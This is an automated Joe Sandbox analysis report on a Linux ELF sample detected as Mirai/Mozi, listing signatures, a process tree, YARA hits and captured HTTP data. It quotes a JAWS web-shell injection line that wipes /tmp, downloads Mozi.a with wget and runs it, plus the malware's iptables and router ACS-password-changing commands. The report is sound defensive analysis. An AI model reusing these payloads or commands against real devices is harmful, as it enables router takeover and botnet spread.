Edit tour

Linux Analysis Report
ZFvtIZszMd

Overview

General Information

Sample Name:	ZFvtIZszMd
Analysis ID:	557423
MD5:	ddba92dcf5c5fd7b791f6278a3e20fb8
SHA1:	635075a22cd4e3ade3583d4e9787a09b06e50b76
SHA256:	bc08d8a3541834634fa5fd606805ee6e24cd07575af27bbcbb8ad02247cccd38
Tags:	32armelfmirai
Infos:

Detection

Mirai

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Mirai

Multi AV Scanner detection for submitted file

Sample tries to persist itself using System V runlevels

Opens /proc/net/* files useful for finding connected devices and routers

Sample tries to persist itself using /etc/profile

Connects to many ports of the same IP (likely port scanning)

Drops files in suspicious directories

Uses known network protocols on non-standard ports

Found strings indicative of a multi-platform dropper

Sample reads /proc/mounts (often used for finding a writable filesystem)

Terminates several processes with shell command 'killall'

Writes ELF files to disk

Yara signature match

Writes shell script files to disk

Reads system information from the proc file system

Uses the "uname" system call to query kernel version information (possible evasion)

Enumerates processes within the "proc" file system

Detected TCP or UDP traffic on non-standard ports

Sample listens on a socket

Writes HTML files containing JavaScript to disk

Sample contains strings that are potentially command strings

Sample contains strings indicative of password brute-forcing capabilities

Sample has stripped symbol table

Sample tries to set the executable flag

HTTP GET or POST without a user agent

Executes commands using a shell command-line interpreter

Executes the "rm" command used to delete files or directories

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior

Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures

Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	557423
Start date:	21.01.2022
Start time:	04:31:53
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 25s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	ZFvtIZszMd
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Detection:	MAL
Classification:	mal100.spre.troj.evad.lin@0/487@4/0

Warnings

Report size exceeded maximum capacity and may have missing network information.
TCP Packets have been reduced to 100
Created / dropped Files have been reduced to 100
VT rate limit hit for: http://200.123.205.169:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws

Runtime Messages

Command:	/tmp/ZFvtIZszMd
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:	telnetd: no process found utelnetd: no process found scfgmgr: no process found Unsupported ioctl: cmd=0xffffffff80045705 Unsupported ioctl: cmd=0xffffffff80045705 Unsupported ioctl: cmd=0xffffffff80045705 /bin/sh: 1: cfgtool: not found /bin/sh: 1: cfgtool: not found Unsupported ioctl: cmd=0xffffffff80045705 qemu: uncaught target signal 4 (Illegal instruction) - core dumped Unsupported ioctl: cmd=0xffffffff80045705 Unsupported ioctl: cmd=0xffffffff80045705 Unsupported ioctl: cmd=0xffffffff80045705 Unsupported ioctl: cmd=0xffffffff80045705 Unsupported ioctl: cmd=0xffffffff80045705

Process Tree

system is lnxubuntu20

dash New Fork (PID: 5188, Parent: 4331)

cat (PID: 5188, Parent: 4331, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.dvcVrUcqjW

dash New Fork (PID: 5189, Parent: 4331)

head (PID: 5189, Parent: 4331, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10

dash New Fork (PID: 5190, Parent: 4331)

tr (PID: 5190, Parent: 4331, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037

dash New Fork (PID: 5191, Parent: 4331)

cut (PID: 5191, Parent: 4331, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80

dash New Fork (PID: 5192, Parent: 4331)

cat (PID: 5192, Parent: 4331, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.dvcVrUcqjW

dash New Fork (PID: 5193, Parent: 4331)

head (PID: 5193, Parent: 4331, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10

dash New Fork (PID: 5194, Parent: 4331)

tr (PID: 5194, Parent: 4331, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037

dash New Fork (PID: 5195, Parent: 4331)

cut (PID: 5195, Parent: 4331, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80

dash New Fork (PID: 5196, Parent: 4331)

rm (PID: 5196, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.dvcVrUcqjW /tmp/tmp.b2DlyODsJX /tmp/tmp.FBXdssB42e

ZFvtIZszMd (PID: 5247, Parent: 5109, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/ZFvtIZszMd

ZFvtIZszMd New Fork (PID: 5249, Parent: 5247)

ZFvtIZszMd New Fork (PID: 5251, Parent: 5249)

ZFvtIZszMd New Fork (PID: 5253, Parent: 5251)

sh (PID: 5253, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"

sh New Fork (PID: 5255, Parent: 5253)

killall (PID: 5255, Parent: 5253, MD5: cd2adedbee501869ac691b88af39cd8b) Arguments: killall -9 telnetd utelnetd scfgmgr

ZFvtIZszMd New Fork (PID: 5256, Parent: 5251)

ZFvtIZszMd New Fork (PID: 5258, Parent: 5251)

ZFvtIZszMd New Fork (PID: 5260, Parent: 5251)

ZFvtIZszMd New Fork (PID: 5277, Parent: 5260)

sh (PID: 5277, Parent: 5260, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 42337 -j ACCEPT"

sh New Fork (PID: 5279, Parent: 5277)

iptables (PID: 5279, Parent: 5277, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 42337 -j ACCEPT

ZFvtIZszMd New Fork (PID: 5284, Parent: 5260)

sh (PID: 5284, Parent: 5260, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 42337 -j ACCEPT"

sh New Fork (PID: 5286, Parent: 5284)

iptables (PID: 5286, Parent: 5284, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 42337 -j ACCEPT

ZFvtIZszMd New Fork (PID: 5287, Parent: 5260)

sh (PID: 5287, Parent: 5260, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 42337 -j ACCEPT"

sh New Fork (PID: 5289, Parent: 5287)

iptables (PID: 5289, Parent: 5287, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 42337 -j ACCEPT

ZFvtIZszMd New Fork (PID: 5292, Parent: 5260)

sh (PID: 5292, Parent: 5260, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 42337 -j ACCEPT"

sh New Fork (PID: 5294, Parent: 5292)

iptables (PID: 5294, Parent: 5292, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 42337 -j ACCEPT

ZFvtIZszMd New Fork (PID: 5295, Parent: 5260)

sh (PID: 5295, Parent: 5260, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 42337 -j ACCEPT"

sh New Fork (PID: 5297, Parent: 5295)

iptables (PID: 5297, Parent: 5295, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 42337 -j ACCEPT

ZFvtIZszMd New Fork (PID: 5298, Parent: 5260)

sh (PID: 5298, Parent: 5260, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 42337 -j ACCEPT"

sh New Fork (PID: 5300, Parent: 5298)

iptables (PID: 5300, Parent: 5298, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 42337 -j ACCEPT

ZFvtIZszMd New Fork (PID: 5301, Parent: 5260)

sh (PID: 5301, Parent: 5260, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 42337 -j ACCEPT"

sh New Fork (PID: 5303, Parent: 5301)

iptables (PID: 5303, Parent: 5301, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 42337 -j ACCEPT

ZFvtIZszMd New Fork (PID: 5304, Parent: 5260)

sh (PID: 5304, Parent: 5260, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 42337 -j ACCEPT"

sh New Fork (PID: 5306, Parent: 5304)

iptables (PID: 5306, Parent: 5304, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 42337 -j ACCEPT

ZFvtIZszMd New Fork (PID: 5264, Parent: 5251)

ZFvtIZszMd New Fork (PID: 5268, Parent: 5251)

ZFvtIZszMd New Fork (PID: 5275, Parent: 5251)

ZFvtIZszMd New Fork (PID: 5310, Parent: 5251)

sh (PID: 5310, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"

sh New Fork (PID: 5312, Parent: 5310)

iptables (PID: 5312, Parent: 5310, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP

ZFvtIZszMd New Fork (PID: 5313, Parent: 5251)

sh (PID: 5313, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"

sh New Fork (PID: 5315, Parent: 5313)

iptables (PID: 5315, Parent: 5313, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP

ZFvtIZszMd New Fork (PID: 5316, Parent: 5251)

sh (PID: 5316, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"

sh New Fork (PID: 5318, Parent: 5316)

iptables (PID: 5318, Parent: 5316, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP

ZFvtIZszMd New Fork (PID: 5319, Parent: 5251)

sh (PID: 5319, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"

sh New Fork (PID: 5321, Parent: 5319)

iptables (PID: 5321, Parent: 5319, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP

ZFvtIZszMd New Fork (PID: 5322, Parent: 5251)

sh (PID: 5322, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""

ZFvtIZszMd New Fork (PID: 5324, Parent: 5251)

sh (PID: 5324, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""

ZFvtIZszMd New Fork (PID: 5326, Parent: 5251)

sh (PID: 5326, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"

sh New Fork (PID: 5328, Parent: 5326)

iptables (PID: 5328, Parent: 5326, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP

ZFvtIZszMd New Fork (PID: 5331, Parent: 5251)

sh (PID: 5331, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"

sh New Fork (PID: 5333, Parent: 5331)

iptables (PID: 5333, Parent: 5331, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP

ZFvtIZszMd New Fork (PID: 5334, Parent: 5251)

sh (PID: 5334, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"

sh New Fork (PID: 5336, Parent: 5334)

iptables (PID: 5336, Parent: 5334, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP

ZFvtIZszMd New Fork (PID: 5337, Parent: 5251)

sh (PID: 5337, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"

sh New Fork (PID: 5339, Parent: 5337)

iptables (PID: 5339, Parent: 5337, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP

ZFvtIZszMd New Fork (PID: 5340, Parent: 5251)

sh (PID: 5340, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"

sh New Fork (PID: 5342, Parent: 5340)

iptables (PID: 5342, Parent: 5340, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP

ZFvtIZszMd New Fork (PID: 5343, Parent: 5251)

sh (PID: 5343, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"

sh New Fork (PID: 5345, Parent: 5343)

iptables (PID: 5345, Parent: 5343, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP

ZFvtIZszMd New Fork (PID: 5346, Parent: 5251)

sh (PID: 5346, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"

sh New Fork (PID: 5348, Parent: 5346)

iptables (PID: 5348, Parent: 5346, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP

ZFvtIZszMd New Fork (PID: 5349, Parent: 5251)

sh (PID: 5349, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"

sh New Fork (PID: 5351, Parent: 5349)

iptables (PID: 5351, Parent: 5349, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP

ZFvtIZszMd New Fork (PID: 5352, Parent: 5251)

sh (PID: 5352, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"

sh New Fork (PID: 5354, Parent: 5352)

iptables (PID: 5354, Parent: 5352, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP

ZFvtIZszMd New Fork (PID: 5355, Parent: 5251)

sh (PID: 5355, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"

sh New Fork (PID: 5357, Parent: 5355)

iptables (PID: 5357, Parent: 5355, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP

ZFvtIZszMd New Fork (PID: 5359, Parent: 5251)

sh (PID: 5359, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"

sh New Fork (PID: 5361, Parent: 5359)

iptables (PID: 5361, Parent: 5359, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP

ZFvtIZszMd New Fork (PID: 5362, Parent: 5251)

sh (PID: 5362, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"

sh New Fork (PID: 5364, Parent: 5362)

iptables (PID: 5364, Parent: 5362, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP

ZFvtIZszMd New Fork (PID: 5398, Parent: 5251)

sh (PID: 5398, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 15453 -j ACCEPT"

sh New Fork (PID: 5400, Parent: 5398)

iptables (PID: 5400, Parent: 5398, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p udp --destination-port 15453 -j ACCEPT

ZFvtIZszMd New Fork (PID: 5401, Parent: 5251)

sh (PID: 5401, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 15453 -j ACCEPT"

sh New Fork (PID: 5403, Parent: 5401)

iptables (PID: 5403, Parent: 5401, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p udp --source-port 15453 -j ACCEPT

ZFvtIZszMd New Fork (PID: 5404, Parent: 5251)

sh (PID: 5404, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 15453 -j ACCEPT"

sh New Fork (PID: 5406, Parent: 5404)

iptables (PID: 5406, Parent: 5404, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 15453 -j ACCEPT

ZFvtIZszMd New Fork (PID: 5407, Parent: 5251)

sh (PID: 5407, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 15453 -j ACCEPT"

sh New Fork (PID: 5409, Parent: 5407)

iptables (PID: 5409, Parent: 5407, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 15453 -j ACCEPT

ZFvtIZszMd New Fork (PID: 5410, Parent: 5251)

sh (PID: 5410, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 15453 -j ACCEPT"

sh New Fork (PID: 5412, Parent: 5410)

iptables (PID: 5412, Parent: 5410, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I INPUT -p udp --dport 15453 -j ACCEPT

ZFvtIZszMd New Fork (PID: 5413, Parent: 5251)

sh (PID: 5413, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 15453 -j ACCEPT"

sh New Fork (PID: 5415, Parent: 5413)

iptables (PID: 5415, Parent: 5413, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I OUTPUT -p udp --sport 15453 -j ACCEPT

ZFvtIZszMd New Fork (PID: 5416, Parent: 5251)

sh (PID: 5416, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 15453 -j ACCEPT"

sh New Fork (PID: 5418, Parent: 5416)

iptables (PID: 5418, Parent: 5416, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I PREROUTING -t nat -p udp --dport 15453 -j ACCEPT

ZFvtIZszMd New Fork (PID: 5419, Parent: 5251)

sh (PID: 5419, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 15453 -j ACCEPT"

sh New Fork (PID: 5423, Parent: 5419)

iptables (PID: 5423, Parent: 5419, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 15453 -j ACCEPT

cleanup

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
ZFvtIZszMd	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
ZFvtIZszMd	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
ZFvtIZszMd	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
ZFvtIZszMd	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
ZFvtIZszMd	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
/usr/networks	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
/usr/networks	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
/usr/networks	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
/usr/networks	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
/usr/networks	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
5249.1.00000000940d2638.000000002d110c1c.rw-.sdmp	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
5249.1.000000001a019d01.000000004a78c7a2.r-x.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
5249.1.000000001a019d01.000000004a78c7a2.r-x.sdmp	JoeSecurity_Mirai_5	Yara detected Mirai	Joe Security
5249.1.000000001a019d01.000000004a78c7a2.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5249.1.000000001a019d01.000000004a78c7a2.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
5268.1.00000000940d2638.000000002d110c1c.rw-.sdmp	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
5247.1.000000001a019d01.000000004a78c7a2.r-x.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
5247.1.000000001a019d01.000000004a78c7a2.r-x.sdmp	JoeSecurity_Mirai_5	Yara detected Mirai	Joe Security
5247.1.000000001a019d01.000000004a78c7a2.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5247.1.000000001a019d01.000000004a78c7a2.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
5247.1.00000000940d2638.000000002d110c1c.rw-.sdmp	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
5268.1.000000001a019d01.000000004a78c7a2.r-x.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
5268.1.000000001a019d01.000000004a78c7a2.r-x.sdmp	JoeSecurity_Mirai_5	Yara detected Mirai	Joe Security
5268.1.000000001a019d01.000000004a78c7a2.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5268.1.000000001a019d01.000000004a78c7a2.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
Process Memory Space: ZFvtIZszMd PID: 5247	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
Process Memory Space: ZFvtIZszMd PID: 5249	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
Process Memory Space: ZFvtIZszMd PID: 5249	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security
Process Memory Space: ZFvtIZszMd PID: 5268	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
Click to see the 14 entries

HTTP traffic detected: HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/7.5X-AspNet-Version: 1.1.4322Set-Cookie: ASP.NET_SessionId=2t0qh0ecr3aygl45zqhp5555; path=/Set-Cookie: awstats=1; path=/X-Powered-By: http://www.evoSuite.comDate: Fri, 21 Jan 2022 03:35:26 GMTContent-Length: 926Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 f4 db 6f be 78 9e be fc ea c9 f3 b3 93 f4 a3 ed bb 77 bf 7b ef e4 ee dd a7 6f 9e ca 17 fb e3 9d f4 4d 9d 2d 9b a2 2d aa 65 56 de bd 7b fa e2 a3 23 7a 1f df d2 cf 1f 7b fc ed d3 e3 a7 f8 e5 c7 1e b7 45 5b e6 47 af f3 e9 ba ce d3 26 6f 1a 7a 23 5d 56 6d 5a e7 d3 ea 62 59 34 f9 2c dd 3e 4a 3f ff 32 7d 72 7c f2 7b fd ae 8f ef ca 0b fc ee 22 6f b3 74 99 2d f2 cf 3e fa fc f4 c5 e9 ab e3 37 5f be fa 28 9d 56 cb 36 5f b6 9f 7d f4 45 31 ad ab a6 3a 6f d3 9f 2c 9a 75 56 a6 af db f5 ac a8 d2 f1 8b d3 37 e9 83 f1 2e 50 0a a1 9c 7c f9 f4 f4 f7 7f 7e fc e2 f3 af 8e 3f 3f f5 20 e9 fb 4f b2 a6 98 6e 78 fd b2 f9 fd 67 f9 79 b6 2e db 93 b2 a0 17 5f 4f eb 62 d5 7a 70 be 93 5d 66 fa 61 ec e5 36 ab 2f 72 7a 6b 9e 2f 32 ef ad 79 db ae 1e dd bd db f0 e7 cd 78 61 86 35 9e 56 8b bb 05 35 2a 4b 22 d3 b2 c9 ef 16 f9 7d 06 fc f8 ae 21 f0 e3 27 5f 3e fd 7d f0 cb 8f 3d 3e af ea 85 f6 f5 8c 7e dd fd 28 a5 de e7 d5 ec b3 8f 56 55 43 58 66 53 cc d6 67 1f e9 10 2e aa 49 36 7d 3b ce 9a d5 bb df e3 17 7d b6 fb 0b b3 c5 ea f0 b3 fd 9d fd 43 45 67 77 ef c1 78 87 fe db 7d 74 b0 73 f7 f3 55 b5 04 d0 bb b3 22 bb f8 fd f1 db ef 51 2c b2 8b bc b9 fb 51 5a 50 0f f8 84 09 f6 b8 58 ae d6 6d da 5e af 08 8d 79 31 9b e5 cb 8f 14 a9 df ff f7 ff c9 b3 d3 ef be 7e 73 fc 86 48 7f 99 95 6b fa 6c f6 f4 aa 7d f1 d3 5f ed 7c f1 83 e9 f5 17 6f de ee 7e f9 83 e6 93 8b fa 17 3d 7b fd ba 58 ec fe de 2f 4f 0e 5e ee 2f 2f db 57 d5 a7 5f fe a2 b3 27 ef 2e 3e fb 28 bd 4b 9d 60 b8 3f f6 f8 